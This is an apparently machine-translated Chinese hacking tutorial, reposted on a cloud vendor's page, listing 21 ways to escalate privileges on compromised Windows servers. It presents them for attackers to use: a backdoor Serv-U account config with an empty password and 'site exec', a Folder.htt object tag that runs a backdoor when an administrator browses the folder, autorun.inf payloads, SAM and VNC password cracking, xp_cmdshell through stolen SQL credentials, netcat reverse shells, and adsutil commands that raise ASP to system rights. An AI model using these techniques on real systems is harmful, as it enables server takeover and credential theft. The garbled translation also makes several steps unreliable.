Ring's privilege elevation 21 Method _ Security Tutorial

Source: Internet
Author: User
Tags mssql mssql server pcanywhere
Author: Nah article source: http://blog.77169.com/more.asp?name=atan19a&id=6866

All of the following are my summary of the right time to sum up many methods so far no chance to test and did not succeed, but I did see others succeed

Of I am not, except the first method of their own research, the other is the experience of others summary. Hope to help a friend!

1.radmin Connection method

The condition is that you have enough permissions and the other person has no firewall. Package a radmin up, run, open the other port, and then radmin up

。 I have never been successful in rice. , the port is open to the other side.

2.pcanywhere

C:\Documents and Settings\All Users\Application Data\symantec\pcanywhere\ here under his GIF

files, installing pcanywhere on the local

3.SAM cracked

C:\WINNT\system32\config\ his Sam cracked it.

4.SU Password Seizure

C:\Documents and Settings\All users\"Start menu \ programs \

References: Serv-u, then view the properties locally, know the path, see if you can jump
After entering, if have permission to modify Servudaemon.ini, add a user up, the password is empty
[User=wekwen|1]
password=
Homedir=c:\
timeout=600
Maintenance=system
access1=c:\| Rwamelcdp
access1=d:\| Rwamelcdp
access1=f:\| Rwamelcdp
skeyvalues=
This user has the highest privileges, then we can ftp up to quote site exec xxx to elevate permissions

5.c:\winnt\system32\inetsrv\data\

Reference: This is the directory, the same is erveryone Full control, all we have to do is to upload the tools to enhance the rights,

And then execute

6.SU overflow Claim

This online tutorial n more than a detailed explanation

7. Run Csript

Reference: Run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get W3svc/inprocessisapiapps" couched

L Permission
With this cscript C:\Inetpub\AdminScripts\adsutil.vbs get W3svc/inprocessisapiapps
To view a privileged DLL file: Idq.dll httpext.dll httpodbc.dll Ssinc.dll msw3prt.dll
and add Asp.dll to the privileged tribe.
Asp.dll is placed in C:\winnt\system32\inetsrv\asp.dll (different machine positions are not necessarily the same)
We're adding cscript adsutil.vbs Set/w3svc/inprocessisapiapps "C:\WINNT\system32\idq.dll."

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\Winnt\System32

\inetsrv\asp.dll "
You can use cscript adsutil.vbs Get/w3svc/inprocessisapiapps to see if it's added.

8. Script claim

C:\Documents and Settings\All users\"Start menu \ program \ Startup Write Bat,vbs

9.VNC

This is a little flower of the article HOHO

VNC passwords are stored in Hkcu\software\orl\winvnc3\password by default

We can use VNCX4.

To crack it, vncx4 is easy to use, just enter at the command line

C:\>vncx4-w

Then enter each hexadecimal data in the order, without losing a carriage return once on the line.

10.NC right to lift

Give each other an NC, but the only condition is that you have enough permission to run and bounce it back to your computer. HOHO OK

11. The social engineering guest to raise the right
It's easy to see his support. Generally see the account after the password as much as possible to guess the user password may also be his QQ mail

Box number, cell phone number, try to see HOHO.

12.IPC NULL Connection

If the other person is really stupid, sweep his IPC if it's good luck or weak passwords.

13. Replacement Service

You don't have to say that, do you? Personal feelings are pretty complicated.

14.autorun. inf

Autorun=xxx.exe this = later write HOHO and read only, system, hidden attributes to which disk can not believe

He doesn't run

15.desktop.ini and Folder.htt

References: First, we now create a local folder, the name is not important, enter it, in the margin point right, select "Custom

Folder "(XP does not seem to be the case) has been the next point, the default can be. When you're done, you'll see that there are two more folders named folder

Setting file racks and Desktop.ini files (if you don't see them, first cancel "Hide protected operating system files") and then

We found the Folder.htt file in the folder setting directory, Notepad open, add the following code anywhere: <object

Id= "Runit" width=0 height=0 type= "Application/x-oleobject" codebase= "your backdoor filename" >

</OBJECT> then you put your backdoor file in the folder setting directory and upload this directory with Desktop.ini to each other

Any directory, you can, as long as the administrator to browse the directory, it executed our back door

16.SU cover claim

Install a local su, cover your own Servudaemon.ini file with a servudaemon.ini downloaded from him, heavy

Serv-u, so all of your configuration is exactly the same as his.

17.SU turn to the originator port

43958 This is the SERV-U local management port. FPIPE.exe upload him, execute command: Fpipe–v–l 3333–r

43958 127.0.0.1 means to map 4444 ports to 43958 ports. You can then install a serv-u locally, creating a new

Server, IP fill in IP, account for localadministrator password for #1@ $ak #.1k;0@p connection, you can manage his

Serv-u.

18.SQL Account password Disclosure

If the other side opened the MSSQL server, we can use the SQL Connector plus the Administrator account (can be from his connection to the database

ASP file, because MSSQL is the default system permission.

Reference: The other side did not delete the xp_cmdshell method: Use Sqlexec.exe, in the host column to fill in each other Ip,user and pass

Fill in the username and password you obtained. Format Select xp_cmdshell '%s '. Then click Connect, and then you can

To enter the cmd command you want in the CMD column.

19.asp.dll

Reference: Because the Asp.dll is placed in the C:\winnt\system32\inetsrv\asp.dll (different machine positions are not necessarily the same

)
We're adding cscript adsutil.vbs Set/w3svc/inprocessisapiapps "C:\WINNT\system32\idq.dll."

"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"

"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\Winnt\System32

\inetsrv\asp.dll "
Okay, now you can use cscript adsutil.vbs Get/w3svc/inprocessisapiapps to see if it's added.
, note that the use of get and set, one is to view one is set. And you're going to run it.

C:\inetpub\adminscripts> in this directory.
So if you are an administrator, your machine by the use of this trick to upgrade the ASP to system permissions, then, the way to prevent is to

Asp.dll T out of the privileged clan, that is, with set this command, cover up just those dongdong.

20.Magic Winmail

If you're going to have a Webshell quote: http://www.eviloctal.com/forum/read.php?tid=3587 here to see it.

21.DBO ...

In fact, the way to enhance the rights of a lot of people to see how we use the HOHO refueling bar to control the end of the server!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.